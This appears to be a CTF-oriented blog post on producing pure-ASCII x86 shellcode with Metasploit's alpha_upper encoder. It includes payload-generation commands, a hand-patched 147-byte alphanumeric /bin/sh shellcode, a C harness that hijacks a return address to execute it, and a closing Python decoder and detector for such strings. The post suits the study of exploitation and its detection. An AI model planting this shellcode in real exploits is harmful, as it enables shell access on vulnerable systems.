A pure-ASCII shellcode showed up in the last SSCTF final.
Today I mainly looked into how this kind of shellcode is generated.
1. Alpha shellcode
This kind of shellcode is "alpha" (alphanumeric) shellcode. There is a tool for it, alpha3 (https://code.google.com/p/alpha3/), but I could not work out how to use it; its command line is fairly complicated.
2. Using msfencode
This is Metasploit's encoder. Run
msfencode -l
to list all available encoders. x86/alpha_upper is the encoder we need.
I followed the method found online to generate and encode the shellcode in one pipeline, but it kept failing with "invalid command":
msfpayload linux/x86/exec cmd="/bin/sh" | msfencode -e x86/alpha_upper -t c
I did not find a fix for that.
3. On closer inspection the problem is in the shellcode generation step, so I switched to generating the shellcode inside msfconsole and saving it to a file:
use payload/linux/x86/exec
set cmd /bin/sh
generate -t raw -f /home/shell.bin
Then encode the raw payload:
msfencode -e x86/alpha_upper -t c
(the -t parameter takes the output language, c or python)
The first few characters of the generated shellcode are still not uppercase letters or digits. Looking at the first few instructions, instructions 2-4 are a GetPC (relocation) stub: after pop ecx executes, ecx = 0804A042, which is the address of the 2nd instruction. (Reference: http://www.programlife.net/shellcode-getpc.html)
Modify the shellcode generated above as follows: replace the first 0x16 bytes with the string below. The shellcode still runs, provided eax holds the shellcode's base address when execution reaches it (the "PY" prefix is push eax / pop ecx, so ecx picks up the base from eax instead of from the GetPC stub).
unsigned char buf[] =
//"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
//"\x43\x43\x43\x43\x43
"PYIIIIIIIIII"
"\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x53\x5a\x54\x4b\x31\x48\x4d\x49"
"\x51\x42\x53\x56\x43\x58\x36\x4d\x55\x33\x4b\x39\x4d\x37\x43"
"\x58\x56\x4f\x53\x43\x33\x58\x53\x30\x42\x48\x56\x4f\x42\x42"
"\x45\x39\x52\x4e\x4c\x49\x4a\x43\x36\x32\x5a\x48\x35\x58\x35"
"\x50\x53\x30\x43\x30\x46\x4f\x45\x32\x32\x49\x32\x4e\x46\x4f"
"\x53\x43\x52\x48\x45\x50\x30\x57\x51\x43\x4b\x39\x4b\x51\x38"
"\x4d\x4b\x30\x41\x41";
4. Testing the shellcode
test2.c
#include <stdio.h>
unsigned char buf[] =
//"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
//"\x43\x43\x43\x43\x43
"PYIIIIIIIIII"
"\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x53\x5a\x54\x4b\x31\x48\x4d\x49"
"\x51\x42\x53\x56\x43\x58\x36\x4d\x55\x33\x4b\x39\x4d\x37\x43"
"\x58\x56\x4f\x53\x43\x33\x58\x53\x30\x42\x48\x56\x4f\x42\x42"
"\x45\x39\x52\x4e\x4c\x49\x4a\x43\x36\x32\x5a\x48\x35\x58\x35"
"\x50\x53\x30\x43\x30\x46\x4f\x45\x32\x32\x49\x32\x4e\x46\x4f"
"\x53\x43\x52\x48\x45\x50\x30\x57\x51\x43\x4b\x39\x4b\x51\x38"
"\x4d\x4b\x30\x41\x41";
int main()
{
    int *ret;
    /* Overwrite main's saved return address with the address of buf.
       &ret + 2 skips the saved ebp; this assumes a 32-bit build (-m32)
       and the classic frame layout, so it is fragile with newer compilers. */
    ret = (int *)&ret + 2;
    (*ret) = (int) buf;
    return 0;
}
Compile command:
gcc test2.c -o test2 -fno-stack-protector -z execstack
(on a 64-bit host add -m32, because the return-address trick above relies on 4-byte pointers)
The final result is a Linux x86 shellcode that spawns a shell:
147 bytes in size
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
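Two checks a practitioner would want at this point, as an added example that is not part of the original post: first, a decoder for the C-style escaped byte strings msfencode prints, which reports every byte outside A-Z0-9 (this is the check the post did by eye when it noticed the GetPC prefix was not alphanumeric); second, a small detection pass that flags long uppercase-alphanumeric runs in request lines and marks those containing the decoder prologue visible in the final string above. The prefix literals and the prologue string are copied from this post; the request lines are constructed samples, and treating the prologue as a reliable match pattern for alpha_upper output in general is an assumption.

```python
import re
import string

# Character set the x86/alpha_upper encoder is supposed to emit: uppercase letters and digits.
ALPHA_UPPER_SET = frozenset((string.ascii_uppercase + string.digits).encode())

# The original 15-byte prefix (GetPC stub) and the 12-byte replacement, both copied from
# the post above as C string literals.
ORIGINAL_PREFIX = r'"\x89\xe6\xd9\xc7\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"'
PATCHED_PREFIX = r'"PYIIIIIIIIII"'

# Decoder prologue exactly as it appears in the post's final 147-byte string, right after
# "PYIIIIIIIIIIQZ". Assumed here to be a usable match pattern for this encoder's output.
ALPHA_UPPER_STUB = "VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"

_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\([\\"nrt0])|(.)', re.S)
_SIMPLE = {"\\": 0x5C, '"': 0x22, "n": 0x0A, "r": 0x0D, "t": 0x09, "0": 0x00}


def parse_c_escapes(literal: str) -> bytes:
    """Decode one or more adjacent C string literals ("\\x89\\xe6" "PYII") into bytes."""
    out = bytearray()
    for chunk in _LITERAL.findall(literal):
        for hexpair, simple, plain in _ESCAPE.findall(chunk):
            if hexpair:
                out.append(int(hexpair, 16))
            elif simple:
                out.append(_SIMPLE[simple])
            else:
                out.append(ord(plain))
    return bytes(out)


def non_alnum_offsets(data: bytes) -> list:
    """Offsets of every byte outside A-Z0-9, i.e. what alpha_upper must not leave behind."""
    return [i for i, b in enumerate(data) if b not in ALPHA_UPPER_SET]


def report(literal: str) -> dict:
    """Decode a C literal and summarise which bytes break the uppercase-alphanumeric rule."""
    data = parse_c_escapes(literal)
    bad = non_alnum_offsets(data)
    return {
        "length": len(data),
        "bad_offsets": bad,
        "bad_bytes": [f"{data[i]:#04x}" for i in bad],
        # Same view the post prints at the end: bytes as text, offenders shown as '.'
        "printable": "".join(chr(b) if b in ALPHA_UPPER_SET else "." for b in data),
    }


def find_alpha_upper_runs(text: str, min_len: int = 64) -> list:
    """Return (offset, length, has_stub) for each run of at least min_len uppercase/digit
    characters in text; has_stub is True when the run contains ALPHA_UPPER_STUB."""
    run_re = re.compile(r"[A-Z0-9]{%d,}" % min_len)
    return [(m.start(), m.end() - m.start(), ALPHA_UPPER_STUB in m.group(0))
            for m in run_re.finditer(text)]


# Constructed sample request lines, not captured traffic. The second one carries the
# post's prefix plus the decoder prologue, padded with 'A's in place of the rest of an
# encoded payload; the third has a long-ish but legitimate token that must not fire.
SAMPLE_LINES = [
    "GET /index.html?id=42 HTTP/1.1",
    "GET /search?q=" + "PYIIIIIIIIIIQZ" + ALPHA_UPPER_STUB + "A" * 90 + " HTTP/1.1",
    "GET /download?token=ABCDEF0123456789ABCDEF0123456789 HTTP/1.1",
]


def scan_lines(lines, min_len: int = 64) -> list:
    """(line_no, offset, run_length, has_stub) for every suspicious run in the lines."""
    return [(n, off, ln, stub)
            for n, line in enumerate(lines)
            for off, ln, stub in find_alpha_upper_runs(line, min_len)]


if __name__ == "__main__":
    for name, lit in (("original prefix", ORIGINAL_PREFIX), ("patched prefix", PATCHED_PREFIX)):
        print(name, report(lit))
    print("hits:", scan_lines(SAMPLE_LINES))
```

Running it shows the original prefix failing at offsets 0-7 (0x89 through 0x5e, including the lowercase 0x76 'v') while the patched "PYIIIIIIIIII" prefix passes, and only the second sample line produces a run long enough to flag, with the prologue present. The run-length threshold is a tunable: legitimate base64 or hex tokens are usually shorter and mix cases, so requiring both a long pure uppercase/digit run and the prologue keeps false positives low.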